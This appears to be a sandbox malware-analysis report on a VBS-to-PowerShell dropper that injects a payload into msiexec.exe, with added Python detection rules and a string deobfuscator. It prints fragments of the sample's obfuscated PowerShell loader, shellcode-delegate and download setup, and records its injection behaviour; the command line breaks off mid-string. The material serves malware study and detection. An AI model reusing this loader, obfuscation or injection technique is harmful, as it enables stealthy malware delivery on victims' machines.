Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb> source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb# source: powershell.exe, 00000007.00000002.2106847629.0000000006D58000.00000004.00000020.00020000.00000000.sdmp
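The process creations above (wscript.exe starting powershell.exe, cmd.exe running ping 127.0.0.1 as a delay, and the 32-bit powershell.exe launching a bare msiexec.exe that later receives the injected payload) are the chain behind the "WScript or CScript Dropper", "Wscript starts Powershell" and "Creates a process in suspended mode" signatures in the summary. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it reconstructs that chain from process-creation events and applies the corresponding rules. The events are constructed to mirror the lines above; the pids and the .vbs path are invented, and because the report's visible lines do not say which process started the SysWOW64 powershell.exe, the example assumes the 64-bit one did.

```python
"""Process-chain rules for the execution tree in this report (added example,
not Joe Sandbox code). Events are constructed from the report's process
creations; pids are invented and the parent of the 32-bit powershell.exe is
an assumption."""
import ntpath
import re

# Constructed process-creation events mirroring the report's chain.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Sample path is assumed; only the file name comes from the report.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"'},
    # IWshShell3.Run("cmd.exe /c ping 127.0.0.1", "0", "1") as seen by AMSI.
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping 127.0.0.1"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping 127.0.0.1"},
    # Obfuscated first stage; the command line is shortened here.
    {"pid": 400, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                '"Get-Service;$Philologer=\'func\';Get-History;$Philologer+=\'t\'"'},
    # Parent assumed: the report only shows this process creating msiexec.exe.
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"'},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    # Benign control event that must not match anything.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}


def image_name(path):
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Image names from the outermost known ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def msiexec_arguments(cmdline):
    """Everything after the (possibly quoted) msiexec.exe path."""
    m = re.match(r'\s*"?[^"]*?msiexec\.exe"?\s*(.*)', cmdline, re.IGNORECASE)
    return (m.group(1) if m else cmdline).strip()


def detect(events):
    """Return (rule, pid) pairs for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        child = image_name(e["image"])
        parent_name = image_name(parent["image"]) if parent else ""
        # "WScript or CScript Dropper": a script host spawning a shell.
        if parent_name in SCRIPT_HOSTS and child in SHELLS:
            hits.append(("script_host_spawns_shell", e["pid"]))
        # ping 127.0.0.1 launched from a shell is a sleep substitute.
        if (child == "ping.exe" and parent_name in SHELLS
                and re.search(r"\b127\.0\.0\.1\b", e["cmdline"])):
            hits.append(("loopback_ping_delay", e["pid"]))
        if child == "msiexec.exe":
            # PowerShell-launched msiexec with no package or switch has no
            # installer work to do: a candidate host for injected code.
            if parent_name in PS_HOSTS and not msiexec_arguments(e["cmdline"]):
                hits.append(("msiexec_without_package", e["pid"]))
            # Same target, judged on the whole chain rather than the parent.
            if SCRIPT_HOSTS & set(ancestry(events, e["pid"])):
                hits.append(("msiexec_under_script_host", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(rule, pid, " -> ".join(ancestry(EVENTS, pid)))
```

The ancestry check matters because the parent of msiexec.exe is the second, 32-bit PowerShell, not the script host; a parent-only rule that keys on wscript.exe would miss the final stage, while a rule keyed on "msiexec.exe with an empty command line under PowerShell" catches it regardless of how many hops sit in between.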

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1", "0", "1");IWshShell3.Run("cmd.exe /c ping 127.0.0.1", "0", "1");IWshShell3.Run("powershell "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes", "0")
      Source: Yara matchFile source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gavekortets $Muliggoerbandonedly $Landskinkernes), (Fotodetektorens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:skadeligste = [AppDomain]::CurrentDomai
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($nierne)), $Vilhelmines).DefineDynamicModule($Rugmel15, $false).DefineType($Skrigeungernes20, $undermanned, [System.MulticastDelegate])
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B5B2D9 push esp; retf 7_2_00B5B2E1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B59E20 push esp; ret 7_2_00B5A159
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06EDEDDE push ds; ret 7_2_06EDEDDF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06EDFA58 push A407E96Ah; retf 7_2_06EDFBCD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087208B0 push ds; iretd 7_2_087208B1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872122B pushad ; iretd 7_2_0872122C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087265A6 push es; ret 7_2_087265B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08721E53 push 83F44D5Ch; retf 7_2_08721EBF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08722E4D push edx; retf 7_2_08722E58
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872060D push edx; ret 7_2_08720626
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872474B push ebp; ret 7_2_0872474D
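The first PowerShell stage quoted in the process-creation entry above hides every string behind one small helper. `$Philologer` is built up to the string `function:`, and `ni -p $Philologer -n Emissionskursers -value {...}` is New-Item on the Function: drive, which defines a function without ever writing the `function` keyword. That helper walks its argument from index 6 in steps of 7 and keeps only the characters it lands on; the other six out of seven are filler. `$Hjlpelsestes` decodes to `ieX`, so the second helper, `Meyers`, is a dot-sourced Invoke-Expression wrapper, and the final `Meyers (Emissionskursers '...')` runs the decoded next stage (the AMSI captures in this section show what that stage does). The Python below is an added example, not code from the sample or from Joe Sandbox; the inputs are copied from the command line the report captured. One caveat a reader of this page needs: the page's copy of the command line has lost the Danish letters (ø, æ, å) that the original strings contained, so chunks that held them no longer align and the URL in `$autogiro`, the User-Agent in `$Splser`, and most of `$Xenon` cannot be recovered from this page; the assignments used here are the all-ASCII ones.

```python
"""Decoder for the string-hiding helper of the first PowerShell stage
(added example; not code from the sample, from Joe Sandbox, or from the
report). Inputs are strings copied from the command line the report shows."""
import re

# Command-line fragment copied from the report (all-ASCII assignments only).
FRAGMENT = (
    "$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';"
    "$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';"
    "$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';"
    "$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';"
    "$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';"
    "$Blokregistreringerne=Emissionskursers ' Aari,>';"
)

# $Xenon as it appears on this page. The original held Danish letters that the
# page extraction dropped, so the 7-character alignment breaks part-way through.
XENON = "Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts"


def every_seventh(blob, start=6, step=7):
    """Re-implements Emissionskursers: $i=6; do { out += s[$i]; $i += 7 }
    until s[$i] is $null, i.e. collect s[6], s[13], s[20], ... to the end."""
    return "".join(blob[i] for i in range(start, len(blob), step))


def decode_assignments(script, helper="Emissionskursers"):
    """Resolve every $var = helper '...' and $var += helper '...' in script,
    concatenating += pieces in order, as the interpreter would."""
    pat = re.compile(r"\$(\w+)\s*(\+?=)\s*" + re.escape(helper) + r"\s+'([^']*)'")
    values = {}
    for name, op, blob in pat.findall(script):
        piece = every_seventh(blob)
        values[name] = (values.get(name, "") + piece) if op == "+=" else piece
    return values


if __name__ == "__main__":
    for name, value in decode_assignments(FRAGMENT).items():
        print(f"${name} = {value!r}")
    # Readable up to "[NeT.serViCepoIntMaNAgeR]::Se", then garbage: the
    # dropped characters shifted every later chunk by one or more positions.
    print("$Xenon ~", every_seventh(XENON))
```

`$Unlaboring` comes out as `Net.WEbcLIenT`, `$Splser` as `Mozilla/` and `$Tilbindes` as `Tls12`; the odd capitalisation is harmless because PowerShell resolves type names and cmdlets case-insensitively, so `New-Object Net.WEbcLIenT` and a `Tls12` protocol assignment work as written. When decoding a fresh copy of the script rather than this page, run it on the raw bytes so the non-ASCII filler is preserved and the alignment holds for every string.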
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5867
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4018
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6447
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3185
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6272 Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6792 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r$Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r$Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Remote Desktop Virtualizati...
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
      Source: svchost.exe, 00000009.00000002.2339166678.0000019942859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2337521153.000001993D22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #Hyper-V Remote Desktop Virtualizati
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Service Interface
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r-Hyper-V Remote Desktop Virtualization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Data Exchange Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $;r!Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Stopped vmicvss
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3CD0000
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N 